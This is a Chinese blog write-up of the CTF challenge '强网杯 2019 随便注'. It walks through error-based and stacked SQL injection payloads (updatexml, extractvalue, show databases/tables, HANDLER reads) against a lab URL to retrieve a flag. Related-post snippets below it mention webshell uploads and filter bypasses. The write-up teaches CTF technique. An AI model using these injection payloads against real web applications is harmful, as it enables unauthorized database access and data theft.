[强网杯 2019]随便注

最新推荐文章于 2024-11-12 20:35:48 发布
最新推荐文章于 2024-11-12 20:35:48 发布
阅读量80 收藏
点赞数
文章标签: 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64222098/article/details/128901185
版权

[强网杯 2019]随便注

在这里插入图片描述
先输入1和1’测试一下注入类型。
输入1时的回显如图所示
在这里插入图片描述
输入1’的回显如图所示
在这里插入图片描述
说明这是注入点,且报错直接输出了,不妨试一下报错注入。构造payload如下:

http://1.14.71.254:28402/?inject=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

在这里插入图片描述
很明显,updatexml被禁了,且/i表明对大小写敏感,不能通过大写绕过,于是试了双写,发现还是不行。那就换另外一个报错注入的函数,构造payload如下:

http://1.14.71.254:28402/?inject=1' and extractvalue(1,concat(0x7e,(show databases)))--+

在这里插入图片描述
很奇怪的是它尽然报了语法错误,没有弄明白。就放弃了报错注入。 尝试堆叠注入,构造payload如下:

http://1.14.71.254:28402/?inject=-1';show databases--+

在这里插入图片描述
堆叠注入成功!然后就开始根据得到的数据库查询更多,博主查询了ctftraining里面没有内容,下面展示查询supersqli的表的构造:

http://1.14.71.254:28402/?inject=-1';show tables from supersqli--+

在这里插入图片描述
报出了两张表,在这里我用handler来读取表里面的内容,构造的payload如下:

http://1.14.71.254:28402/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;handelr `1919810931114514` close--+

成功得到flag!
在这里插入图片描述

dockerere
关注
[CTF]强网杯2019随便
凉水的博客
10-16 394
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之类的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
刷题学习记录(文件上传)
qq_73861475的博客
12-07 445
题目直接给题目标签提示文件上传的类型思路:先上传.htaccess文件,在上传木马文件,最后蚁剑连接上传.htaccess文件再上传一个没有<?的shell但是要把image/png 改成image/jpeg,不然会被拦截过滤蚁剑连接找到flag。
[SWPUCTF 2021 新生赛]第二波放题
weixin_63231007的博客
04-10 3847
[SWPUCTF 2021 新生赛]easyupload2.0 文件上传,抓包试一下 发现php不行。 和1.0一样,只不过不支持php,用phtml就行了 蚁剑连接,在目录中找到flag。 知识点: 通常,在嵌入了php脚本的html中,使用 phtml作为后缀名; 完全是php写的,则使用php作为后缀名。 这两种文件,web服务器都会用php解释器进行解析。 [SWPUCTF 2021 新生赛]babyrce hackbar传入一个cookie:admin=1后,看见ra.
[NISACTF 2022]下
qq_62046696的博客
07-30 2751
打开界面看见这种,格式一般都是利用管道符然后进行堆叠入或者报错入试一下堆叠入试了一下被过滤掉了,那就是报错入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[强网杯 2019]随便1
m0_74741186的博客
10-18 757
还有堆叠入可以测试,只需要加分号就可以了,这个试了好久,发现没加单引号,没有吧前面的语句闭合,就执行不了后面的sql语句。不管是报错入,布尔盲都需要用到select,报错入查数据库名字不需要用到select。查表然后再查列吧,但是查列好像要指定表,查表不要指定因为,默认查的是当前数据库的表。这里是比较难的,因为查到表了,我们就要开始查数据了,但是查数据又要用到select。然后入之后的语句应该是这样的,语句后面应该加个释,好像不释也可以。这个是单引号入,他的源代码应该是这样的。
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 822
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
强网杯2019 随便
BlueDoorZz的博客
07-11 450
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
【BUUCTF】强网杯 2019随便1 write up
GZWZ_的博客
04-06 4908
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
【BUUCTF】web强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 426
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
07 Oracle数据库恢复基础解析:从检查点到归档,一步步构建数据安全防线
超哥的博客
11-09 1262
检查点是Oracle数据库中的一个特殊事件,它的作用是将内存中的数据块同步到磁盘上,以确保数据的持久性。简单来说,就是让数据库“记住”到目前为止所有的更改。Redo日志是Oracle用来记录所有数据更改的日志文件。每次对数据库进行修改时,都会先写入Redo日志,然后再写入数据文件。这样,即使系统崩溃,也能通过Redo日志恢复数据。当数据库运行在归档模式下时,一旦当前的Redo日志文件满,Oracle会将其复制到一个安全的存储位置,并标记为已归档。这样可以长期保留Redo日志,便于历史数据的恢复。
【2024最新】springboot网上商城购物系统lw+ppt
最新发布
man2017的博客
11-12 351
开发技术:SpringBoot、php、Python、小程序、SSM、Vue、MySQL、JSP、ElementUI等,文末源码。专栏推荐:SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码精品专栏:Java精选实战项目源码、Python精选实战项目源码、大数据精选实战项目源码。
数据库和云服务器哪个便宜一些?
petaexpress的博客
11-12 202
云服务器的价格区间相对更广泛,因为用户可以根据实际需求选择不同配置和性能的服务器。而云数据库的价格则更多地依赖于数据库类型和规格。在相同配置下,云服务器的价格可能会略低于云数据库,但这并不是绝对的,因为两者都有不同的优惠政策和计费方式。
Java基于小程序公考学习平台的设计与实现(附源码,文档)
chusheng1840的博客
11-09 1215
Java基于小程序公考学习平台的设计与实现,小程序公考学习平台使用Java语言进行编码,使用Mysql创建数据表保存本系统产生的数据。系统可以提供信息显示和相应服务,其管理小程序公考学习平台信息,查看小程序公考学习平台信息,管理小程序公考学习平台。总之,小程序公考学习平台集中管理信息,有着保密性强,效率高,存储空间大,成本低等诸多优点。它可以降低信息管理成本,实现信息管理计算机化。关键词:小程序公考学习平台;Java语言;Mysql
SMB共享文件夹-Spring项目数据与服务分离基础配置
一只菜鸟夹
11-11 430
某项目需要将数据与服务分离部署在两个服务器,涉及到文件加密访问以及Mysql、ElasticSearch、Redis等数据的互通。下面是自己部署的步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值